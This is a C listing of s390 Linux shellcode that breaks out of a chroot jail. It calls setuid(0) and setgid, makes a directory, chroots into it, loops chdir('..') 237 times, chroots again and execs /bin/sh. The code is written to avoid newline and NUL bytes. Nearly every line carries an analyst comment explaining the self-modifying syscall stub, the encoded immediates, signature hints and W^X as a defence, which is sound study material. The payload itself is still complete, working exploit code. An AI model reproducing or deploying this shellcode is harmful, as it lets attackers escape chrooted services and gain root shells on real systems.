1 /*----------------------------------------------------------------------*/
2 /* s390 shellcode, free of 0x0a and 0x00 bytes */
3 /* setuid / setgid / chroot break */
4 /* code jcyberpunk@thehackerschoice.com */
5 /*----------------------------------------------------------------------*/
/* Byte sequence for 31-bit Linux on s390; the declaration this initializer
 * belongs to is not visible in this listing.
 *
 * Reading notes for analysts:
 * - Position independent: basr %r1,0 captures the current address and every
 *   later operand is a displacement from %r1.
 * - Self-modifying: the single svc near the end is patched before each call
 *   (opcode byte once, call-number byte every time), and the 0x5c bytes after
 *   the strings are overwritten with NUL. The bytes therefore only run from
 *   memory that is both writable and executable; a W^X / non-executable data
 *   mapping stops them.
 * - Encoded immediates: each small value is formed as (lhi immediate) + %r10
 *   with %r10 = -1100, which is how 0x0a and 0x00 stay out of the byte stream.
 *   Signatures should key on the lhi/ar/stc pattern, not on literal call numbers.
 * - Call names below follow the header comment and the 31-bit s390 syscall
 *   numbering. The chroot calls need a caller that still holds root privilege
 *   (chroot(2) requires CAP_SYS_CHROOT), which is why a chrooted service is
 *   expected to drop privileges after entering its jail. */
7 "\x0d\x10" /* basr %r1,0 : %r1 = address of the next instruction, base for all displacements */
8 "\x41\x90\x10\x98" /* la %r9,152(%r1) : %r9 = address of the svc stub called by every basr %r14,%r9 */
9 "\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 : bias added to every later lhi value */
10 "\xa7\x68\x04\x56" /* lhi %r6,1110 */
11 "\x1a\x6a" /* ar %r6,%r10 : %r6 = 10 (0x0a) */
12 "\x42\x60\x10\x98" /* stc %r6,152(%r1) : overwrites the stored 0x0b so the stub's first byte becomes 0x0a (svc) */
13 "\x17\x22" /* xr %r2,%r2 : %r2 = 0 */
14 "\x42\x20\x10\x9f" /* stc %r2,159(%r1) : overwrites the 0x5c after "A.." with NUL */
15 "\x0d\xe9" /* basr %r14,%r9 : svc 23 (setuid) with %r2 = 0 */
16 "\xa7\x68\x04\x7a" /* lhi %r6,1146 */
17 "\x1a\x6a" /* ar %r6,%r10 : %r6 = 46 */
18 "\x42\x60\x10\x99" /* stc %r6,153(%r1) : patches the call-number byte of the svc stub */
19 "\x0d\xe9" /* basr %r14,%r9 : svc 46 (setgid); %r2 is not reloaded, so it holds the previous call's result */
20 "\x41\x20\x10\x9c" /* la %r2,156(%r1) : %r2 -> "A.." */
21 "\x17\x33" /* xr %r3,%r3 : %r3 = 0 */
22 "\xa7\x68\x04\x73" /* lhi %r6,1139 */
23 "\x1a\x6a" /* ar %r6,%r10 : %r6 = 39 */
24 "\x42\x60\x10\x99" /* stc %r6,153(%r1) : patches the call-number byte */
25 "\x0d\xe9" /* basr %r14,%r9 : svc 39 (mkdir) on "A.." with %r3 = 0 */
26 "\x41\x20\x10\x9c" /* la %r2,156(%r1) : %r2 -> "A.." */
27 "\xa7\x68\x04\x89" /* lhi %r6,1161 */
28 "\x1a\x6a" /* ar %r6,%r10 : %r6 = 61 */
29 "\x42\x60\x10\x99" /* stc %r6,153(%r1) : patches the call-number byte */
30 "\x0d\xe9" /* basr %r14,%r9 : svc 61 (chroot) on "A.." */
31 "\xa7\xb8\x05\x39" /* lhi %r11,1337 */
32 "\x1a\xba" /* ar %r11,%r10 : %r11 = 237, loop counter for bct */
33 "\xa7\x68\x04\x58" /* lhi %r6,1112 */
34 "\x1a\x6a" /* ar %r6,%r10 : %r6 = 12 */
35 "\x42\x60\x10\x99" /* stc %r6,153(%r1) : patches the call-number byte */
36 "\x41\x20\x10\x9d" /* la %r2,157(%r1) : %r2 -> ".." (this is the bct target) */
37 "\x0d\xe9" /* basr %r14,%r9 : svc 12 (chdir) on ".." */
38 "\x46\xb0\x10\x58" /* bct %r11,88(%r1) : decrement %r11, branch back to the la above while it is non-zero */
39 "\x41\x20\x10\x9e" /* la %r2,158(%r1) : %r2 -> "." */
40 "\xa7\x68\x04\x89" /* lhi %r6,1161 */
41 "\x1a\x6a" /* ar %r6,%r10 : %r6 = 61 */
42 "\x42\x60\x10\x99" /* stc %r6,153(%r1) : patches the call-number byte */
43 "\x0d\xe9" /* basr %r14,%r9 : svc 61 (chroot) on "." */
44 "\xa7\x68\x04\x57" /* lhi %r6,1111 */
45 "\x1a\x6a" /* ar %r6,%r10 : %r6 = 11 */
46 "\x42\x60\x10\x99" /* stc %r6,153(%r1) : patches the call-number byte */
47 "\x41\x20\x10\xa0" /* la %r2,160(%r1) : %r2 -> "/bin/sh" */
48 "\x50\x20\x10\xa8" /* st %r2,168(%r1) : stores that pointer in the word right after the last string byte (argv[0]) */
49 "\x41\x30\x10\xa8" /* la %r3,168(%r1) : %r3 -> the argv array */
50 "\x17\x44" /* xr %r4,%r4 : %r4 = 0 */
51 "\x42\x40\x10\xa7" /* stc %r4,167(%r1) : overwrites the 0x5c after "/bin/sh" with NUL */
52 "\x50\x40\x10\xac" /* st %r4,172(%r1) : zero word following argv[0] (argv terminator) */
53 "\x41\x40\x10\xac" /* la %r4,172(%r1) : %r4 -> that zero word, used as the third argument */
54 "\x0d\xe9" /* basr %r14,%r9 : svc 11 (execve) */
55 "\x0b\x17" /* svc 23 <--- after modification; stored as 0x0b 0x17, both bytes are rewritten at run time */
56 "\x07\xfe" /* br %r14 : return to the instruction after the calling basr */
57 "\x41\x2e\x2e\x5c" /* A.. <---- used for mkdir,chroot,chdir; trailing 0x5c is a placeholder for NUL */
58 "\x2f\x62\x69\x6e" /* /bin */
59 "\x2f\x73\x68\x5c"; /* /sh\\ ; trailing 0x5c is a placeholder for NUL */
63 void (*z)()=(void*)shellcode; /* z aliases the byte array as a function pointer (an object-to-function pointer conversion ISO C does not define). The call through z is not visible in this listing; it can only work if the array's memory is mapped writable and executable, since the bytes patch themselves. */